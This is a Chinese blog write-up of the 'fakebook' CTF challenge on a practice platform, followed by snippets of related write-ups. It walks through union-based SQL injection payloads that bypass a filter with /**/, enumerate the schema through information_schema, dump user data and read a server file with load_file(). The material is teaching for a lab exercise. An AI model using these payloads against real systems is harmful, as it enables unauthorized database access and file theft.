攻防世界-fakebook

最新推荐文章于 2024-06-15 22:06:16 发布
最新推荐文章于 2024-06-15 22:06:16 发布
阅读量273 收藏
点赞数
分类专栏: 攻防世界-wp 文章标签: sql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_47571887/article/details/121387941
版权

打开题目,就一个登陆页面,来回看了看也没啥

注册了个账号,进去之后,查看了下源代码,发现了一个view.php?no=1

 应该是存在注入点,

view.php?no=1 and 1=1# 正常

view.php?no=1 and 1=2# 报错 则存在注入点

view.php?no= union/**/select 1,2,3,4#  //由于过滤了很多,只能用/**/绕过

 只有2有回显,我们进行利用

view.php?no=2 union/**/select 1,database(),3,4#

view.php?no=2 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'#

view.php?no=2 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'#

view.php?no=2 union/**/select 1,group_concat(data),3,4 from fakebook.users#

按照顺序一步步来,得到

 通过伪造最后字段获取flag

查看一下源代码

点击data获取到flag

菜狗一枚,欢迎交流学习。

攻防世界--fakebook
m0_67467924的博客
05-22 675
继续注入,得到数据库中存在一个users表,表中含有no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS 字段,查看username,passwd字段内容,不对,这个内容就是我刚刚注册的,没有其他用户的,对我来说没用啊,看看data字段,返回值是序列化后的值。构造payload:2 /**/union /**/ select 1,load_file('/var/www/html/flag.php') ,3,4#
攻防世界】十九 --- fakebook --- ssrf
qq_43168364的博客
12-29 629
题目 — fakebook 一、writeup 使用dirsearch扫描目录 flag应该在flag.txt文件中 访问robots.txt文件,得到了一个目录 下来了一个文件,user.php.bak。该文件先丢在这里等下再审计,主页没有任何发现,前端代码中没有提示,login.php 也没有找到可以利用的点(可以尝试:sql,xss,逻辑漏洞,写入日志文件,爆破) 来到join.php页面注册了一个admin用户 从首页可以访问到admin用户的页面,发现存在一个查询字符串,其有sql注入漏洞
攻防世界fakebook
舞动的獾
07-23 694
fakebook 拿到题目,发现页面上有两个按钮,一个为join,另外一个为login,可能在注册登录界面存在注入漏洞,首先查看join。 先扔到sqlmap里面跑一波,但长时间没启动了,sqlmap坏了,没办法,手动注入吧。 先注册一个账号试试,用admin,看看admin是否能被注册,发现真的可以,但是似乎并没有什么卵用,不要忘了一个习惯,扫描。 结果发现了如下几个文件: flag.php flag.phps robots.txt view.php login.php join.php 访问一下注册
fakebook攻防世界) (正则+robots+sql+绕过)
一醉一休的博客
02-23 1904
一、fakebook攻防世界) 1) 2)扫描下可以找到有robots.txt 3)输入/user.php.bak发现一个PHP文本,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://(可有可无),然后是数字和字符,加一个. 然后是2-6个字母 4)创建个用户,主要注意blog 5)注册成功返回 6)点开aaa 7)url中有no=1,尝试or'1'='1注入,存在注入后 order by 4# 8)...
攻防世界——fakebook
m0_62063669的博客
06-22 2100
攻防世界——fakebook /user.php.bak发现一个PHP文本,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://注册成功 点击username里的1url中有no=1,可以尝试一下,是否有注入(and 1=1不报错,and 1=2报错,所以存在sql注入) order by 4不报错,order by 5报错,所以有四个字段尝试查询数据库名,然后被拦截 尝试绕过,/**/可以绕过,发现2是回显点 得到当前数据库为fakebook ......
CTF笔记 攻防世界 fakebook
qq_51248658的博客
10-10 1499
第一次做,拿到题目一开始就被注册难住了,blog该填啥???于是忍不住直接就去看wp了。。。。。。后面过了一段时间再去做发现,除了注册,后面还是没有思路,只是隐约记得有个反序列化。。。。这里就记一下,加深以下印像。第一次认真跟着大佬的wp一步步做下来,学到了很多,sql注入那里还是有些薄弱,判断闭合的时候总想不到直接空格,多积累吧。。。。
攻防世界-web高手进阶区
zji
04-25 6891
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界web进阶区Fakebook
gongjingege的博客
08-04 494
打开链接 是一个类似博客的界面,有登录和注册,考虑sql注入,先注册吧 注册后用户名可以点击 会发现url栏/view.php?no=1,估计在这里注入,试了一下,存在注入点 order by 4回显正常,5不行,所以4列 用union select注入,但是被过滤了 百度可以用/**/注释符绕过, no=-1 union/**/select 1,2,3,4# 从unserialize()可以看出,数据保存时序列化,输出反序列化,显示在博客界面。 还有文件的绝对路径/var/www/html/ 直
攻防世界WEB练习-Fakebook
墨鱼菜鸡
09-10 261
目录 题目场景 访问robots.txt 下载文件并查看 尝试进行注册 尝试SQL注入 猜测字段 查询数据库名 查询表名 查询段名 查看data数据 扫描目录 读取文件 查看源码 base64解码 提取flag 题目场景 访问robots.txt 下载文件并查看 <?php class Use...
fakebook-攻防世界
szhangliwenya的博客
04-05 1812
换而言之,原SQL语句的查询结果为空,而我们通过union加入了我们构造的查询语句,让SQL语句有了查询结果,并且此查询结果符合页面渲染要求,所以页面正常显示了。并且由此得知,只要有data字段的对象序列,就可以成功渲染页面,其他字段并不是很重要。(页面中age和blog的值,显然也都是从序列化的对象里面得到的)通过之前查的数据username是字段2,猜测data是字段4按顺序来嘛。1' and 1=1 --+报错。1' and 1=2 --+报错。1 and 1=1 正常。1 and 1=2 报错。
【web | CTF】攻防世界fakebook
weixin_46301214的博客
05-26 864
解题要点 【解题思路】 1)先进行CTF定点目录扫描 2)发现存在flag.php返回303数值 3)根据页面正常注册登录 4)在用户页面测试一下发现存在SQL注入 5)成功注入后,没在数据库里发现flag 6)检测此时数据库用户权限,发现是root 7)利用load_file()读取系统文件flag.php 【难点】 1)检测sql注入是被如何过滤了 2...
攻防世界(Web进阶区)——fakebook
垃圾管理员的垃圾站
04-09 7493
这个思路可能并不是靶场原本想要让用户做的,但也无妨吧,怎样不是做呢。象棋高手总结了几十年的经验,也可能会输给新入门的新手。新手经验不足,更不谈什么战术,无心的一步棋,可能会让老者思前顾后,露出弱点。 进入靶场: 除了一个login登陆按钮,还有一个join注册按钮。开始之前,一般习惯性的扫描下目录,看看有什么。如果大家经常刷题,可以自己写一个目录扫描工具,然后自己整理一套刷题的...
攻防世界-高手进阶区之Fakebook
Sacrifice_li的博客
06-11 889
进来页面看到的是这样的东西: 然后先去随便点一下看看东西,这里有个join,想要注册一下内容,但是这个blog的格式不对的话就没办法join 这里就暂时没有什么思路了。 接下来去看看目录有哪些东西: 用kali的dirb或者nikto: 里面有一个bak文件,下载下来解压看一看: 然后大致查阅了一下内容,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://(可有可无),然后是数字和字符,加一个. 然后是2-6个字母,所以随便构造一个h.
攻防世界web-fakebook
m0_52061428的博客
02-24 556
3个可用值,分别是name,age和blog,这个就是join.php里面的操作啊,思前想后,估计利用点是在blog这里。ok,那么问题来了,我们可不可以对序列化后的语句进行修改从而给no=2赋值一个新值呢,我们来试试。都知道他flag.php在什么位置了,我们还是root,那么直接拿flag。看来是可以的,那么我们来看看序列化的语句,那一部分是可以进行修改的。刚刚找到的data://并没有被利用,所以我们进行尝试。本来以为是盲注结果没成,后面发现no=2是可以利用的。并且在源码中发现一个可以利用的东西。
【愚公系列】2023年05月 攻防世界-Web(fakebook
时光隧道
05-27 7783
SQL注入是通过将恶意代码注入到SQL语句中,从而将攻击者想要的任意数据库操作(例如删除,修改或查看数据)注入到应用程序中的一种安全漏洞。这种攻击通常是通过在Web表单,搜索框或其他用户输入字段中添加特殊字符或代码来实现的,这些字符或代码可以使SQL语句产生意外的行为。攻击者可以利用这种漏洞访问敏感的数据库信息,包括用户凭据、私人信息和个人身份信息。为了保护应用程序不受SQL注入攻击的影响,开发人员通常应在接受用户输入时对数据进行验证和过滤,并使用参数化查询或预编译语句来防止SQL注入。
攻防世界-fakebook题目__详解
chinese_cabbage0的博客
06-15 1051
攻防世界题目的详解,sql。ssrf。php
攻防世界fakebook
weixin_46107179的博客
08-02 190
首先进入题目之后,看见login和join,尝试注册一个账户,同时用dirsearch扫描一下网站 发现有flag.php,直接访问并没有什么结果,然后看见一个robots.txt,访问之后有一个备份的bak文件,下载下来,并没有发现什么;然后再去看看页面 点击admin进去之后,观察到URL中可能存在SQL注入,尝试简单地检测 view.php?no=1 and 1=1# view.php?no=1 and 1=2# 这两个回显不一样,存在SQL注入 通过order by查询一共四列,通过union s
fakebook
最新发布
03-25
好的,用户提到Fakebook,看起来可能与CTF题目有关,特别是网鼎杯2018的题目。用户引用了多个涉及SQL注入、PHP反序列化和SSRF的内容。首先,我需要整理这些引用中的关键点。 首先,引用[2]和[3]指出存在SQL注入点,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值